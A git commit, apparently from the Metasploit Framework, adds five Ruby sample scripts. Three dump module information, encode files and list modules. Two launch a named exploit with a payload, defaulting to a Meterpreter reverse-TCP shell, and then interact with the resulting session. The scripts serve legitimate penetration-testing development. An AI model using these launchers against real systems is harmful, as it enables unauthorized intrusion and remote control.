a handful of framework samples
git-svn-id: file:///home/svn/incoming/trunk@3145 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
d99f972357
commit
dcae2ac5a7
|
@ -0,0 +1,26 @@
|
|||
#!/usr/bin/ruby
|
||||
#
|
||||
# This sample demonstrates how a module's information can be easily serialized
|
||||
# to a readable format.
|
||||
#
|
||||
|
||||
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
||||
|
||||
require 'msf/base'
|
||||
|
||||
if (ARGV.empty?)
|
||||
puts "Usage: #{File.basename(__FILE__)} module_name"
|
||||
exit
|
||||
end
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
|
||||
begin
|
||||
# Create the module instance.
|
||||
mod = framework.modules.create(ARGV.shift)
|
||||
|
||||
# Dump the module's information in readable text format.
|
||||
puts Msf::Serializer::ReadableText.dump_module(mod)
|
||||
rescue
|
||||
puts "Error: #{$!}\n\n#{$@.join("\n")}"
|
||||
end
|
|
@ -0,0 +1,26 @@
|
|||
#!/usr/bin/ruby
|
||||
#
|
||||
# This sample demonstrates how a file can be encoded using a framework
|
||||
# encoder.
|
||||
#
|
||||
|
||||
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
||||
|
||||
require 'msf/base'
|
||||
|
||||
if (ARGV.empty?)
|
||||
puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
|
||||
exit
|
||||
end
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
|
||||
begin
|
||||
# Create the encoder instance.
|
||||
mod = framework.encoders.create(ARGV.shift)
|
||||
|
||||
puts(Msf::Simple::Buffer.transform(
|
||||
mod.encode(IO.readlines(ARGV.shift).join), ARGV.shift || 'ruby'))
|
||||
rescue
|
||||
puts "Error: #{$!}\n\n#{$@.join("\n")}"
|
||||
end
|
|
@ -0,0 +1,16 @@
|
|||
#!/usr/bin/ruby
|
||||
#
|
||||
# This sample demonstrates enumerating all of the modules in the framework and
|
||||
# displays their module type and reference name.
|
||||
#
|
||||
|
||||
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
||||
|
||||
require 'msf/base'
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
|
||||
# Enumerate each module in the framework.
|
||||
framework.modules.each_module { |name, mod|
|
||||
puts "#{mod.type}: #{name}"
|
||||
}
|
|
@ -0,0 +1,48 @@
|
|||
#!/usr/bin/ruby
|
||||
#
|
||||
# This sample demonstrates using the framework core directly to launch an
|
||||
# exploit. It makes use of the simplified exploit wrapper method provided by
|
||||
# the Msf::Simple::Exploit mixin.
|
||||
#
|
||||
|
||||
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
||||
|
||||
require 'msf/base'
|
||||
|
||||
if (ARGV.length == 0)
|
||||
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
|
||||
exit
|
||||
end
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
exploit_name = ARGV.shift || 'test/multi/aggressive'
|
||||
payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
|
||||
input = Rex::Ui::Text::Input::Stdio.new
|
||||
output = Rex::Ui::Text::Output::Stdio.new
|
||||
|
||||
begin
|
||||
# Initialize the exploit instance
|
||||
exploit = framework.exploits.create(exploit_name)
|
||||
|
||||
# Fire it off.
|
||||
session = exploit.exploit_simple(
|
||||
'Payload' => payload_name,
|
||||
'OptionStr' => ARGV.join(' '),
|
||||
'LocalInput' => input,
|
||||
'LocalOutput' => output)
|
||||
|
||||
# If a session came back, try to interact with it.
|
||||
if (session)
|
||||
output.print_status("Session #{session.sid} created, interacting...")
|
||||
output.print_line
|
||||
|
||||
session.init_ui(input, output)
|
||||
|
||||
session.interact
|
||||
else
|
||||
output.print_line("Exploit completed, no session was created.")
|
||||
end
|
||||
|
||||
rescue
|
||||
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
|
||||
end
|
|
@ -0,0 +1,64 @@
|
|||
#!/usr/bin/ruby
|
||||
#
|
||||
# This sample demonstrates using the framework core directly to launch an
|
||||
# exploit. It uses the framework base Framework class so that the
|
||||
# distribution module path is automatically set, but relies strictly on
|
||||
# framework core classes for everything else.
|
||||
#
|
||||
|
||||
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
||||
|
||||
require 'msf/base'
|
||||
|
||||
if (ARGV.length == 0)
|
||||
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
|
||||
exit
|
||||
end
|
||||
|
||||
framework = Msf::Simple::Framework.create
|
||||
exploit_name = ARGV.shift || 'test/multi/aggressive'
|
||||
payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
|
||||
input = Rex::Ui::Text::Input::Stdio.new
|
||||
output = Rex::Ui::Text::Output::Stdio.new
|
||||
|
||||
begin
|
||||
# Create the exploit driver instance.
|
||||
driver = Msf::ExploitDriver.new(framework)
|
||||
|
||||
# Initialize the exploit driver's exploit and payload instance
|
||||
driver.exploit = framework.exploits.create(exploit_name)
|
||||
driver.payload = framework.payloads.create(payload_name)
|
||||
|
||||
# Import options specified in VAR=VAL format from the supplied command
|
||||
# line.
|
||||
driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
|
||||
|
||||
# Share the exploit's datastore with the payload.
|
||||
driver.payload.share_datastore(driver.exploit.datastore)
|
||||
|
||||
# Initialize the target index to what's in the exploit's data store or
|
||||
# zero by default.
|
||||
driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
|
||||
|
||||
# Initialize the exploit and payload user interfaces.
|
||||
driver.exploit.init_ui(input, output)
|
||||
driver.payload.init_ui(input, output)
|
||||
|
||||
# Fire it off.
|
||||
session = driver.run
|
||||
|
||||
# If a session came back, try to interact with it.
|
||||
if (session)
|
||||
output.print_status("Session #{session.sid} created, interacting...")
|
||||
output.print_line
|
||||
|
||||
session.init_ui(input, output)
|
||||
|
||||
session.interact
|
||||
else
|
||||
output.print_line("Exploit completed, no session was created.")
|
||||
end
|
||||
|
||||
rescue
|
||||
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
|
||||
end
|
Loading…
Reference in New Issue